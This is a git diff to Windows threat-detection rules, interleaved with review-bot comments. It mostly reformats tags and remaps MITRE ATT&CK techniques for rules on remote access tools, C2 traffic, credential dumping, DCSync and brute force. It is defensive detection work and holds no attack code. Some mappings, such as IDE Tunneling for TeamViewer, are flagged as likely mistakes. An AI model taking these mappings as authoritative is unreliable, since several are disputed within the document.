@@ -65,20 +65,7 @@ references = [ risk_score = 47 rule_id = "78de1aeb-5225-4067-b8cc-f4a1de8a8546" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Windows Security Event Logs", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -107,14 +94,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/command_and_control_sunburst_c2_activity_detected.toml b/rules/windows/command_and_control_sunburst_c2_activity_detected.toml index 53c16e9ff6d..8431bd3c030 100644 --- a/rules/windows/command_and_control_sunburst_c2_activity_detected.toml +++ b/rules/windows/command_and_control_sunburst_c2_activity_detected.toml 
@@ -2,7 +2,7 @@
 creation_date = "2020/12/14"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/02/03"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -130,36 +130,18 @@ network where host.os.type == "windows" and event.type == "protocol" and network
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1071"
 name = "Application Layer Protocol"
 reference = "https://attack.mitre.org/techniques/T1071/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1071.001"
 name = "Web Protocols"
 reference = "https://attack.mitre.org/techniques/T1071/001/"
-
-
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1195"
-name = "Supply Chain Compromise"
-reference = "https://attack.mitre.org/techniques/T1195/"
-[[rule.threat.technique.subtechnique]]
-id = "T1195.002"
-name = "Compromise Software Supply Chain"
-reference = "https://attack.mitre.org/techniques/T1195/002/"
-
-
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-
diff --git a/rules/windows/command_and_control_teamviewer_remote_file_copy.toml b/rules/windows/command_and_control_teamviewer_remote_file_copy.toml
index 3bb1e29bf23..63bb0f13837 100644
--- a/rules/windows/command_and_control_teamviewer_remote_file_copy.toml
+++ b/rules/windows/command_and_control_teamviewer_remote_file_copy.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/09/02"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/19"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -124,6 +124,7 @@ file where host.os.type == "windows" and event.type == "creation" and process.na
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1105"
 name = "Ingress Tool Transfer"
@@ -134,9 +135,12 @@ id = "T1219"
 name = "Remote Access Tools"
 reference = "https://attack.mitre.org/techniques/T1219/"
+[[rule.threat.technique.subtechnique]]
+id = "T1219.001"
+name = "IDE Tunneling"
+reference = "https://attack.mitre.org/techniques/T1219/001/"
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
-
diff --git a/rules/windows/command_and_control_tool_transfer_via_curl.toml b/rules/windows/command_and_control_tool_transfer_via_curl.toml
index 760413874e8..0ee101aa41c 100644
--- a/rules/windows/command_and_control_tool_transfer_via_curl.toml
+++ b/rules/windows/command_and_control_tool_transfer_via_curl.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/03"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/08/27"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -108,14 +108,23 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1071"
+name = "Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1071/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1071.001"
+name = "Web Protocols"
+reference = "https://attack.mitre.org/techniques/T1071/001/"
+
 [[rule.threat.technique]]
 id = "T1105"
 name = "Ingress Tool Transfer"
 reference = "https://attack.mitre.org/techniques/T1105/"
-
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
-
diff --git a/rules/windows/command_and_control_tunnel_yuze.toml b/rules/windows/command_and_control_tunnel_yuze.toml
index a3a6314cc2e..d7edec827c7 100644
--- a/rules/windows/command_and_control_tunnel_yuze.toml
+++ b/rules/windows/command_and_control_tunnel_yuze.toml
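Review bot: The sub-technique added under T1219 in the teamviewer_remote_file_copy hunk is `T1219.001` / `IDE Tunneling`, which does not match what this rule covers; TeamViewer is remote desktop software, and the sub-technique for that is `T1219.002` / `Remote Desktop Software` (the same sub-technique that this diff removes from the velociraptor_shell_execution rule further down). Unless the IDE Tunneling mapping was chosen deliberately, the three added lines should read `id = "T1219.002"`, `name = "Remote Desktop Software"`, `reference = "https://attack.mitre.org/techniques/T1219/002/"`. The new `[[rule.threat.technique.subtechnique]]` table is also inserted with no blank line on either side, unlike the other technique insertions in this commit.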
@@ -2,7 +2,7 @@
 creation_date = "2026/03/18"
 integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/18"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -86,6 +86,12 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1090"
+name = "Proxy"
+reference = "https://attack.mitre.org/techniques/T1090/"
+
 [[rule.threat.technique]]
 id = "T1572"
 name = "Protocol Tunneling"
diff --git a/rules/windows/command_and_control_velociraptor_shell_execution.toml b/rules/windows/command_and_control_velociraptor_shell_execution.toml
index e3a239e9797..3669963ad8b 100644
--- a/rules/windows/command_and_control_velociraptor_shell_execution.toml
+++ b/rules/windows/command_and_control_velociraptor_shell_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/03/18"
 integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/18"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -55,22 +55,7 @@ references = [
 risk_score = 47
 rule_id = "9aeca498-1e3d-4496-9e12-6ef40047eb23"
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Command and Control",
- "Tactic: Execution",
- "Tactic: Defense Evasion",
- "Resources: Investigation Guide",
- "Data Source: Elastic Defend",
- "Data Source: Sysmon",
- "Data Source: SentinelOne",
- "Data Source: Microsoft Defender for Endpoint",
- "Data Source: Crowdstrike",
- "Data Source: Elastic Endgame",
- "Data Source: Windows Security Event Logs"
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -90,17 +75,36 @@ process where host.os.type == "windows" and event.type == "start" and process.co
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1219"
 name = "Remote Access Tools"
 reference = "https://attack.mitre.org/techniques/T1219/"
-[[rule.threat.technique.subtechnique]]
-id = "T1219.002"
-name = "Remote Desktop Software"
-reference = "https://attack.mitre.org/techniques/T1219/002/"
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.001"
+name = "PowerShell"
+reference = "https://attack.mitre.org/techniques/T1059/001/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.003"
+name = "Windows Command Shell"
+reference = "https://attack.mitre.org/techniques/T1059/003/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/windows/credential_access_adidns_wildcard.toml b/rules/windows/credential_access_adidns_wildcard.toml
index e3c6af87519..6a18ecf1e11 100644
--- a/rules/windows/credential_access_adidns_wildcard.toml
+++ b/rules/windows/credential_access_adidns_wildcard.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/03/26"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -83,16 +83,7 @@ Set-AuditRule -AdObjectPath 'AD:\\CN=MicrosoftDNS,DC=DomainDNSZones,DC=Domain,DC
 ```
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Credential Access",
- "Data Source: Active Directory",
- "Use Case: Active Directory Monitoring",
- "Data Source: Windows Security Event Logs",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Active Directory", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -104,14 +95,26 @@ any where host.os.type == "windows" and event.code == "5137" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1557"
 name = "Adversary-in-the-Middle"
 reference = "https://attack.mitre.org/techniques/T1557/"
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1557"
+name = "Adversary-in-the-Middle"
+reference = "https://attack.mitre.org/techniques/T1557/"
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
diff --git a/rules/windows/credential_access_browsers_unusual_parent.toml b/rules/windows/credential_access_browsers_unusual_parent.toml
index 7ba940e2c6d..44ceeb7b2a5 100644
--- a/rules/windows/credential_access_browsers_unusual_parent.toml
+++ b/rules/windows/credential_access_browsers_unusual_parent.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/08/27"
 integration = ["windows", "endpoint", "system", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/08/27"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -62,19 +62,7 @@ references = ["https://www.elastic.co/security-labs/katz-and-mouse-game"]
 risk_score = 73
 rule_id = "46b01bb5-cff2-4a00-9f87-c041d9eab554"
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Credential Access",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Data Source: Windows Security Event Logs",
- "Data Source: Microsoft Defender for Endpoint",
- "Data Source: Sysmon",
- "Data Source: SentinelOne",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -108,10 +96,25 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1185"
+name = "Browser Session Hijacking"
+reference = "https://attack.mitre.org/techniques/T1185/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1555"
 name = "Credentials from Password Stores"
 reference = "https://attack.mitre.org/techniques/T1555/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1555.003"
 name = "Credentials from Web Browsers"
@@ -121,5 +124,3 @@ reference = "https://attack.mitre.org/techniques/T1555/003/"
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
-
diff --git a/rules/windows/credential_access_bruteforce_admin_account.toml b/rules/windows/credential_access_bruteforce_admin_account.toml
index 11bbd6482f2..9282a6ec9af 100644
--- a/rules/windows/credential_access_bruteforce_admin_account.toml
+++ b/rules/windows/credential_access_bruteforce_admin_account.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/29"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2026/03/09"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -135,24 +135,18 @@ from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id,
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1110"
 name = "Brute Force"
 reference = "https://attack.mitre.org/techniques/T1110/"
-[[rule.threat.technique.subtechnique]]
-id = "T1110.001"
-name = "Password Guessing"
-reference = "https://attack.mitre.org/techniques/T1110/001/"
 [[rule.threat.technique.subtechnique]]
 id = "T1110.003"
 name = "Password Spraying"
 reference = "https://attack.mitre.org/techniques/T1110/003/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
diff --git a/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml b/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml
index d53b19cc348..b1d6834d68b 100644
--- a/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml
+++ b/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/29"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2026/03/09"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -150,24 +150,18 @@ from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id,
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1110"
 name = "Brute Force"
 reference = "https://attack.mitre.org/techniques/T1110/"
-[[rule.threat.technique.subtechnique]]
-id = "T1110.001"
-name = "Password Guessing"
-reference = "https://attack.mitre.org/techniques/T1110/001/"
 [[rule.threat.technique.subtechnique]]
 id = "T1110.003"
 name = "Password Spraying"
 reference = "https://attack.mitre.org/techniques/T1110/003/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
diff --git a/rules/windows/credential_access_cmdline_dump_tool.toml b/rules/windows/credential_access_cmdline_dump_tool.toml
index 1c55bf1c603..fc208976de4 100644
--- a/rules/windows/credential_access_cmdline_dump_tool.toml
+++ b/rules/windows/credential_access_cmdline_dump_tool.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/24"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "system"]
 maturity = "production"
-updated_date = "2025/09/11"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -65,20 +65,7 @@ references = [
 risk_score = 73
 rule_id = "00140285-b827-4aee-aa09-8113f58a08f3"
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Credential Access",
- "Tactic: Defense Evasion",
- "Resources: Investigation Guide",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Data Source: Windows Security Event Logs",
- "Data Source: Microsoft Defender for Endpoint",
- "Data Source: SentinelOne",
- "Data Source: Sysmon",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Sysmon"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -120,10 +107,12 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1003"
 name = "OS Credential Dumping"
 reference = "https://attack.mitre.org/techniques/T1003/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1003.001"
 name = "LSASS Memory"
@@ -134,27 +123,7 @@ id = "T1003.003"
 name = "NTDS"
 reference = "https://attack.mitre.org/techniques/T1003/003/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1218"
-name = "System Binary Proxy Execution"
-reference = "https://attack.mitre.org/techniques/T1218/"
-[[rule.threat.technique.subtechnique]]
-id = "T1218.011"
-name = "Rundll32"
-reference = "https://attack.mitre.org/techniques/T1218/011/"
-
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/windows/credential_access_dcsync_newterm_subjectuser.toml b/rules/windows/credential_access_dcsync_newterm_subjectuser.toml
index 84f640f4534..f694907853e 100644
--- a/rules/windows/credential_access_dcsync_newterm_subjectuser.toml
+++ b/rules/windows/credential_access_dcsync_newterm_subjectuser.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/12/19"
 integration = ["windows", "system"]
 maturity = "production"
-updated_date = "2025/11/14"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -80,17 +80,7 @@ Audit Directory Service Access (Success,Failure)
 ```
 """
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Credential Access",
- "Tactic: Privilege Escalation",
- "Use Case: Active Directory Monitoring",
- "Data Source: Active Directory",
- "Resources: Investigation Guide",
- "Data Source: Windows Security Event Logs",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Credential Access", "Data Source: Active Directory", "Resources: Investigation Guide", "Data Source: Windows Security Event Logs"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -106,39 +96,21 @@ event.code:"4662" and host.os.type:"windows" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1003"
 name = "OS Credential Dumping"
 reference = "https://attack.mitre.org/techniques/T1003/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1003.006"
 name = "DCSync"
 reference = "https://attack.mitre.org/techniques/T1003/006/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat.technique.subtechnique]]
-id = "T1078.002"
-name = "Domain Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/002/"
-
-
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["winlog.event_data.SubjectUserName"]
diff --git a/rules/windows/credential_access_dcsync_replication_rights.toml b/rules/windows/credential_access_dcsync_replication_rights.toml
index 43c9f1c9b13..63a8203908d 100644
--- a/rules/windows/credential_access_dcsync_replication_rights.toml
+++ b/rules/windows/credential_access_dcsync_replication_rights.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/02/08"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2025/09/11"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -87,17 +87,7 @@ Audit Directory Service Access (Success,Failure)
 ```
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Credential Access",
- "Tactic: Privilege Escalation",
- "Data Source: Active Directory",
- "Resources: Investigation Guide",
- "Use Case: Active Directory Monitoring",
- "Data Source: Windows Security Event Logs",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Active Directory", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -114,39 +104,21 @@ host.os.type:"windows" and event.code:"4662" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1003"
 name = "OS Credential Dumping"
 reference = "https://attack.mitre.org/techniques/T1003/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1003.006"
 name = "DCSync"
 reference = "https://attack.mitre.org/techniques/T1003/006/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat.technique.subtechnique]]
-id = "T1078.002"
-name = "Domain Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/002/"
-
-
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["winlog.event_data.SubjectUserSid", "winlog.event_data.ObjectName"]
diff --git a/rules/windows/credential_access_dcsync_user_backdoor.toml b/rules/windows/credential_access_dcsync_user_backdoor.toml
index e220648179d..836c3cce9ff 100644
--- a/rules/windows/credential_access_dcsync_user_backdoor.toml
+++ b/rules/windows/credential_access_dcsync_user_backdoor.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/07/10"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2025/11/14"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -78,16 +78,7 @@ references = [
 risk_score = 47
 rule_id = "f8822053-a5d2-46db-8c96-d460b12c36ac"
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Credential Access",
- "Data Source: Active Directory",
- "Use Case: Active Directory Monitoring",
- "Data Source: Windows Security Event Logs",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -106,19 +97,26 @@ event.code:"5136" and host.os.type:"windows" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1003"
-name = "OS Credential Dumping"
-reference = "https://attack.mitre.org/techniques/T1003/"
-[[rule.threat.technique.subtechnique]]
-id = "T1003.006"
-name = "DCSync"
-reference = "https://attack.mitre.org/techniques/T1003/006/"
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
 [rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/windows/credential_access_disable_kerberos_preauth.toml b/rules/windows/credential_access_disable_kerberos_preauth.toml
index f69365d6a48..75151aa640e 100644
--- a/rules/windows/credential_access_disable_kerberos_preauth.toml
+++ b/rules/windows/credential_access_disable_kerberos_preauth.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/01/24"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
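Review bot: The second threat entry in the dcsync_user_backdoor hunk is written without the blank-line separators the rest of this commit inserts: `+reference = "https://attack.mitre.org/tactics/TA0003/"` is followed directly by `+[[rule.threat]]`, `+framework = "MITRE ATT&CK"` and `+[[rule.threat.technique]]`, whereas the browsers_unusual_parent and adidns_wildcard hunks add a `+` blank line between each table. The same applies to the iis_connectionstrings_dumping hunk, where `+[[rule.threat.technique.subtechnique]]` follows `+reference = ".../T1552/"` with no separator; keeping one layout across the commit avoids churn the next time these files are normalized. Separately, this file keeps its `credential_access_` name while Credential Access no longer appears in its tags or threat mapping (both now Persistence and Privilege Escalation); if the prefix is kept for rule-history reasons that is fine, but it is worth stating, since the rule's name and description are outside this hunk and a reader will otherwise assume a mismatch.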
@@ -68,18 +68,7 @@ Audit User Account Management (Success,Failure)
 ```
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Credential Access",
- "Tactic: Defense Evasion",
- "Tactic: Privilege Escalation",
- "Resources: Investigation Guide",
- "Use Case: Active Directory Monitoring",
- "Data Source: Active Directory",
- "Data Source: Windows Security Event Logs",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Active Directory", "Data Source: Windows Security Event Logs"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -91,48 +80,18 @@ any where host.os.type == "windows" and event.code == "4738" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1558"
 name = "Steal or Forge Kerberos Tickets"
 reference = "https://attack.mitre.org/techniques/T1558/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1558.004"
 name = "AS-REP Roasting"
 reference = "https://attack.mitre.org/techniques/T1558/004/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1562"
-name = "Impair Defenses"
-reference = "https://attack.mitre.org/techniques/T1562/"
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat.technique.subtechnique]]
-id = "T1078.002"
-name = "Domain Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/002/"
-
-
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules/windows/credential_access_dnsnode_creation.toml b/rules/windows/credential_access_dnsnode_creation.toml
index 4dd21727dec..565abdd5b21 100644
--- a/rules/windows/credential_access_dnsnode_creation.toml
+++ b/rules/windows/credential_access_dnsnode_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/03/26"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -83,16 +83,7 @@ Set-AuditRule -AdObjectPath 'AD:\\CN=MicrosoftDNS,DC=DomainDNSZones,DC=Domain,DC
 ```
 """
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Credential Access",
- "Data Source: Active Directory",
- "Use Case: Active Directory Monitoring",
- "Data Source: Windows Security Event Logs",
- "Resources: Investigation Guide",
-]
